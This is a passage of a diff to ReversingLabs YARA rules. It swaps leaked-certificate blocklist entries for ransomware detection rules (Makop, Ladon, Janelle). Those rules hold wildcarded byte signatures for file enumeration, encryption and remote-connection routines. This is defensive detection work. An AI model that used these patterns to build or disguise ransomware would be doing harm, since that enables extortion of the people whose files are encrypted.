?? 2B C8 51 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? + 83 C6 ?? FF 8D ?? ?? ?? ?? 75 ?? 33 F6 39 B5 ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 59 39 B5 ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 39 B5 ?? + ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 FF 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? + ?? 83 C7 ?? 3B 85 ?? ?? ?? ?? 0F 8C ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 + E8 ?? ?? ?? ?? 85 C0 59 59 0F 85 ?? ?? ?? ?? 39 85 ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 59 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 85 ?? + ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 59 59 B0 ?? E9 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 50 53 C6 + 01 ?? E8 ?? ?? ?? ?? 59 39 B5 ?? ?? ?? ?? 59 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 59 39 B5 ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 39 B5 ?? ?? ?? ?? 74 + ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 8B 85 ?? ?? ?? ?? 53 C6 00 ?? E8 ?? ?? ?? + ?? EB ?? 8D 85 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C6 00 ?? EB ?? 0F + 84 ?? ?? ?? ?? C6 07 ?? FF 15 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 59 59 83 BD ?? ?? ?? + ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? + FF 15 ?? ?? ?? ?? 32 C0 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? C9 C3 + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Adobe Systems" and pe.signatures[i].serial=="58:a5:41:d5:0f:9e:2f:ab:43:80:c6:a2:ed:43:3b:82" and 1341792000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and $search_and_encrypt_files and $remote_connection_1 and $remote_connection_2 } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_5F273626859Ae4Bc4Becbbeb71E2Ab2D : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Makop : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "The digital certificate has leaked." + description = "Yara rule that detects Makop ransomware." author = "ReversingLabs" - id = "a80dcaba-73f9-51d0-a75a-b6348fd305c6" - date = "2023-11-08" - modified = "2023-11-08" + id = "9b7d42f3-0417-5228-8b25-244224cbc414" + date = "2020-10-30" + modified = "2020-10-30" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1380-L1396" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "c8be504f075041508f299b1df03d9cb9e58d9a89f49b7a926676033d18b108ba" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Makop.yara#L1-L99" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "0ff4739d32b4a775d07a5f22d551ed67025681d4986e4404c9a01ad4078468f3" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Makop" + tc_detection_factor = 5 importance = 25 + strings: + $find_files_p1 = { + 8D 54 24 ?? 52 56 FF 15 ?? ?? ?? ?? 56 8B F8 6A ?? 89 7C 24 ?? FF 15 ?? ?? ?? ?? 50 + FF 15 ?? ?? ?? ?? 83 FF ?? 75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 + C4 ?? 5F 5E 5B 8B E5 5D C3 33 F6 89 74 24 ?? EB ?? 8D A4 24 ?? ?? ?? ?? 8D 64 24 ?? + 66 8B 44 24 ?? 66 85 C0 0F 84 ?? ?? ?? ?? 66 3D ?? ?? 75 ?? 66 8B 44 24 ?? 66 85 C0 + 0F 84 ?? ?? ?? ?? 66 3D ?? ?? 75 ?? 66 83 7C 24 ?? ?? 0F 84 ?? ?? ?? ?? 8D 44 24 ?? + EB ?? 8D 9B ?? ?? ?? ?? 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 8D 54 24 ?? 2B C2 D1 F8 83 + E8 ?? 85 F6 8B F8 89 7C 24 ?? 75 ?? 8B 45 ?? 05 ?? ?? ?? ?? 03 C0 0F 84 ?? ?? ?? ?? + 50 56 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 89 44 24 ?? 8B F0 0F 84 ?? ?? ?? + ?? F6 44 24 ?? ?? 0F 84 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 38 85 FF 74 ?? 8B 1F 8D 54 24 + ?? 8B CA 2B D9 8D 49 ?? 0F B7 04 13 66 3D ?? ?? 72 ?? 66 3D ?? ?? 77 ?? 83 C0 ?? 0F + B7 C8 0F B7 02 66 3D ?? ?? 72 ?? 66 3D ?? ?? 77 ?? 83 C0 ?? 83 C2 ?? 66 85 C9 0F B7 + C0 74 ?? 66 3B C8 74 ?? 0F B7 D0 0F B7 C1 2B C2 0F 84 ?? ?? ?? ?? 8B 7F ?? 85 FF 75 + ?? 8B 7D ?? 8B 55 ?? 81 C7 ?? ?? ?? ?? 8B DE E8 ?? ?? ?? ?? 8B 4D ?? 8D 5C 4E ?? BA + ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 1C 56 8D 54 24 ?? BF ?? ?? ?? + ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4D ?? 8D 54 08 ?? 8B 45 ?? 52 56 50 E8 + } + $find_files_p2 = { + 83 C4 ?? E9 ?? ?? ?? ?? 8D 5C 24 ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 8B 4D ?? + 80 79 ?? ?? 0F 85 ?? ?? ?? ?? 8B 55 ?? 03 FA 81 FF ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 8B + 15 ?? ?? ?? ?? C6 44 24 ?? ?? 8B 7D ?? 81 C7 ?? ?? ?? ?? 8B DE E8 ?? ?? ?? ?? 8A 44 + 24 ?? 84 C0 75 ?? 8B 55 ?? 83 C7 ?? 8D 5E ?? E8 ?? ?? ?? ?? 8A 44 24 ?? 8A C8 8B 54 + 24 ?? F6 D9 1B C9 83 E1 ?? F6 D8 8B F1 8D BE ?? ?? ?? ?? 1B C0 83 E0 ?? 83 C0 ?? 03 + 45 ?? 8D 04 42 89 44 24 ?? 8D 58 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 8D BE + ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 8B 54 24 ?? 85 D2 8B 74 24 ?? 8B 45 ?? 77 ?? + 3B 70 ?? 77 ?? B1 ?? EB ?? 8B 55 ?? C6 44 24 ?? ?? E9 ?? ?? ?? ?? 32 C9 88 48 ?? 8B + 4C 24 ?? F6 C1 ?? 74 ?? C6 40 ?? ?? 89 48 ?? EB ?? C6 40 ?? ?? 50 89 50 ?? 89 70 ?? + 8B 44 24 ?? 50 E8 ?? ?? ?? ?? 8B 74 24 ?? 83 C4 ?? A1 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? + 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 54 24 ?? 8D 4C 24 ?? 51 52 FF 15 ?? ?? ?? ?? 85 + C0 0F 85 ?? ?? ?? ?? EB ?? C7 44 24 ?? ?? ?? ?? ?? 8B 74 24 ?? EB ?? 56 6A ?? FF 15 + ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 50 FF 15 ?? ?? ?? ?? 56 6A ?? FF 15 ?? + ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3 + } + $encrypt_files = { + 8B 50 ?? 8B 00 83 EC ?? 55 8B 2D ?? ?? ?? ?? 56 57 6A ?? 8B F9 8D 4C 24 ?? 51 52 50 + 53 FF D5 85 C0 0F 84 ?? ?? ?? ?? 8B 57 ?? 8B 47 ?? 33 F6 56 8D 4C 24 ?? 51 52 50 53 + FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 85 C0 75 ?? B0 ?? 5F 5E 5D 83 + C4 ?? C3 3B 47 ?? 73 ?? 8B C8 83 E1 ?? 74 ?? BE ?? ?? ?? ?? 2B F1 8B 4F ?? 56 03 C8 + 6A ?? 51 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 8B 4F ?? 03 C6 50 8D 54 24 ?? 52 51 6A + ?? 6A ?? 89 44 24 ?? 8B 44 24 ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? + 8B 4C 24 ?? 8B 54 24 ?? 6A ?? 6A ?? 51 52 53 FF D5 85 C0 74 ?? 8B 4C 24 ?? 8B 57 ?? + 8B 3D ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 03 CE 51 52 53 FF D7 85 C0 74 ?? 8B 44 24 ?? + 8D 0C 30 8B 44 24 ?? 3B C1 72 ?? 01 44 24 ?? 8B 44 24 ?? 8B 50 ?? 8B 00 83 54 24 ?? + ?? 6A ?? 6A ?? 52 50 53 FF D5 85 C0 74 ?? 6A ?? 8D 4C 24 ?? 51 6A ?? 8D 54 24 ?? 52 + 53 FF D7 85 C0 74 ?? 83 7C 24 ?? ?? 0F 83 ?? ?? ?? ?? 5F 5E 32 C0 5D 83 C4 ?? C3 + } + $enum_network_resources = { + 55 8B EC 83 E4 ?? 83 EC ?? 53 56 57 68 ?? ?? ?? ?? 6A ?? C7 44 24 ?? ?? ?? ?? ?? C7 + 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? + 8B F0 85 F6 89 74 24 ?? 0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 7D ?? 8D 44 24 ?? 50 51 6A ?? + 6A ?? 57 E8 ?? ?? ?? ?? 85 C0 74 ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B + 7D ?? 68 ?? ?? ?? ?? 6A ?? 56 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? + ?? ?? ?? 8B 4C 24 ?? 83 C4 ?? 8D 54 24 ?? 52 56 8D 44 24 ?? 50 51 E8 ?? ?? ?? ?? 85 + C0 0F 85 ?? ?? ?? ?? 8B 45 ?? 85 C0 75 ?? 8B 54 24 ?? 8B 45 ?? 52 50 EB ?? 8B 4C 24 + ?? 8B 50 ?? 51 52 E8 ?? ?? ?? ?? 33 DB 83 C4 ?? 39 5C 24 ?? 76 ?? 83 C6 ?? 8D 49 ?? + 8B 46 ?? 85 C0 8B C8 75 ?? B9 ?? ?? ?? ?? 8B 46 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 51 8B + 0E 51 50 E8 ?? ?? ?? ?? 8B 46 ?? 83 C4 ?? A8 ?? 74 ?? 8B 56 ?? 85 D2 74 ?? 85 FF 7E + ?? 8B 45 ?? 85 C0 74 ?? 8B 40 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 55 ?? 8B 4D ?? 52 83 + EF ?? 57 8D 46 ?? 50 51 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? F6 06 ?? 74 ?? 50 E8 ?? ?? ?? + ?? 8B 56 ?? 8B 45 ?? 83 C4 ?? 52 50 E8 ?? ?? ?? ?? 83 C3 ?? 83 C6 ?? 3B 5C 24 ?? 0F + 82 ?? ?? ?? ?? 8B 74 24 ?? E9 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 50 E8 ?? ?? ?? ?? 83 + C4 ?? 8B 44 24 ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 56 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 + ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Adobe Systems" and pe.signatures[i].serial=="5f:27:36:26:85:9a:e4:bc:4b:ec:bb:eb:71:e2:ab:2d" and 1341792000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($enum_network_resources) and ( all of ($find_files_p*)) and ($encrypt_files) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_B1Ad46Ce4Db160B348C24F66C9663178 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Ladon : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "The digital certificate has leaked." + description = "Yara rule that detects Ladon ransomware." author = "ReversingLabs" - id = "df34eb28-18ec-568b-8257-0b2f7959868c" - date = "2023-11-08" - modified = "2023-11-08" + id = "ebc8f957-cdcf-54eb-bd02-74088cf51768" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1398-L1414" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "59ce2b7a2e881853d07446b3dda74b296f2be09651364d0e131552cf76dab751" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Ladon.yara#L1-L101" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "979e3f3bf6a67bf10b6bfdd2eeb722d8836096076b7e88c6d4aca041a1a9eecb" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Ladon" + tc_detection_factor = 5 importance = 25 + strings: + $find_files = { + F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 + 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 + 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? + ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? + 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? + ?? ?? ?? 50 57 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? FF 75 ?? 8D 85 + ?? ?? ?? ?? 53 56 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 33 FF 85 DB 74 ?? 90 8B 45 ?? 8B + 34 B8 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 66 8B 08 66 3B 0E 75 ?? 66 85 C9 74 ?? + 66 8B 48 ?? 66 3B 4E ?? 75 ?? 83 C0 ?? 83 C6 ?? 66 85 C9 75 ?? 33 C0 EB ?? 1B C0 83 + C8 ?? 85 C0 74 ?? 47 3B FB 72 ?? 8B 75 ?? 8B 7D ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF + 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 75 ?? 33 DB 83 F8 ?? 0F + 95 C3 FF 15 ?? ?? ?? ?? 5E 8B C3 5B 5F 8B E5 5D C3 + } + $encrypt_files_p1 = { + 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 FF 75 ?? 33 DB 89 5D ?? E8 ?? ?? ?? ?? 8B F8 83 + C4 ?? 89 7D ?? 85 FF 0F 84 ?? ?? ?? ?? 83 3F ?? 0F 85 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? + FF 77 ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 0F 84 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? FF + 77 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? FF + 77 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? FF + 77 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? FF + 77 ?? E8 ?? ?? ?? ?? 8B C8 83 C4 ?? 89 4D ?? 85 C9 0F 84 ?? ?? ?? ?? 83 3E ?? 0F 85 + ?? ?? ?? ?? 8B 45 ?? 83 38 ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 83 38 ?? 0F 85 ?? ?? ?? ?? + 8B 45 ?? 83 38 ?? 0F 85 ?? ?? ?? ?? 83 39 ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 70 + ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? FF 75 ?? 33 FF C7 45 + ?? ?? ?? ?? ?? 89 5D ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 74 ?? 83 3E ?? 75 ?? 57 + 68 ?? ?? ?? ?? FF 76 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? FF 70 ?? 68 ?? ?? ?? ?? + E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 + ?? 8D 45 ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? 8D 7B ?? A1 ?? + ?? ?? ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 1D ?? ?? ?? ?? 85 F6 74 ?? 56 E8 + ?? ?? ?? ?? 83 C4 ?? 8B C7 5F 5E 5B 8B E5 5D C3 FF 76 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? + ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 78 ?? 85 FF 74 ?? 8B 47 ?? 89 45 + } + $encrypt_files_p2 = { + 8B 70 ?? 8D 4E ?? 8A 06 46 84 C0 75 ?? 2B F1 8D 04 75 ?? ?? ?? ?? 50 6A ?? FF 15 ?? + ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 84 9D ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 0C 75 + ?? ?? ?? ?? 51 50 8D 46 ?? 50 8B 45 ?? FF 70 ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B 3F + 43 85 FF 75 ?? 68 ?? ?? ?? ?? C7 84 9D ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 + ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 + ?? E8 ?? ?? ?? ?? 8B 7D ?? 8B 77 ?? 8D 4E ?? 8A 06 46 84 C0 75 ?? 2B F1 8D 46 ?? 50 + 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B C8 89 4D ?? 85 C9 0F 84 ?? ?? ?? ?? + 8B C6 99 6A ?? 2B C2 D1 F8 6A ?? 89 45 ?? 8D 45 ?? 50 51 6A ?? 56 FF 77 ?? FF 15 ?? + ?? ?? ?? 8B 7D ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? + ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 57 8B 7D ?? 8B F0 57 56 FF 15 ?? ?? ?? ?? 56 FF 15 + ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 57 6A ?? FF 15 ?? ?? + ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 45 ?? FF 70 ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? + ?? ?? 8B 7D ?? A1 ?? ?? ?? ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 05 ?? ?? ?? + ?? ?? ?? ?? ?? 85 FF 74 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 33 F6 85 DB 74 ?? FF B4 B5 ?? + ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 46 3B F3 72 ?? 8B 45 ?? 5F 5E + 5B 8B E5 5D C3 + } + $remote_connection = { + 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 50 68 ?? ?? ?? ?? 68 + ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B E5 5D C3 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? + C6 85 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? + ?? 85 C0 0F 88 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 + ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? + 50 E8 ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? + ?? ?? ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D + 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? + ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 85 C0 78 ?? 56 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? + 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? + 85 F6 74 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? + 83 C4 ?? 56 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 5E 8B E5 5D C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Adobe Systems" and pe.signatures[i].serial=="b1:ad:46:ce:4d:b1:60:b3:48:c2:4f:66:c9:66:31:78" and 1341792000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_files) and ( all of ($encrypt_files_p*)) and ($remote_connection) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_256541E204619033F8B09F9Eb7C88Ef8 : INFO FILE +rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Janelle : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Janelle ransomware." author = "ReversingLabs" - id = "d4a5eb19-2964-5d3a-b4c5-ee4396e76814" - date = "2023-11-08" - modified = "2023-11-08" + id = "4fef3be5-8332-5ce2-b1e9-3993e6963331" + date = "2021-12-16" + modified = "2021-12-16" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1416-L1432" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "e33cedf1dd24ac73f77461de0cef25cad57909be2a69469fec450ead7da85c65" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/ByteCode.MSIL.Ransomware.Janelle.yara#L1-L96" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "49f1eac82930606183ab9cf1d5c6c42534d58735876134793e9712e78eb5a4c7" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Janelle" + tc_detection_factor = 5 importance = 25 + strings: + $setup_env_p1 = { + 00 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 73 ?? ?? ?? ?? 0A 06 02 7D ?? ?? + ?? ?? 00 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 0B 07 72 ?? ?? ?? ?? 28 ?? ?? + ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 2B ?? 08 6F + ?? ?? ?? ?? 74 ?? ?? ?? ?? 0D 00 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 6F + ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 00 08 6F ?? ?? ?? ?? 2D ?? DE ?? 08 75 ?? ?? ?? ?? 13 ?? + 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? 00 DC 02 7B ?? ?? ?? ?? 16 6F ?? ?? ?? ?? 00 16 28 ?? + ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 FE 01 13 ?? 11 ?? 2C ?? 00 16 + 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 16 28 ?? + ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 28 ?? ?? ?? + ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 00 02 16 28 ?? ?? ?? ?? 00 00 28 ?? ?? ?? ?? 6F ?? + ?? ?? ?? 6F ?? ?? ?? ?? 16 FE 02 16 FE 01 13 ?? 11 ?? 2C ?? 00 28 ?? ?? ?? ?? 28 ?? ?? + ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? + 12 ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? + ?? 00 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 12 ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 28 ?? ?? ?? + ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 02 + } + $setup_env_p2 = { + 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 7B ?? ?? ?? ?? 28 ?? + ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? + ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 00 02 7B ?? ?? ?? ?? 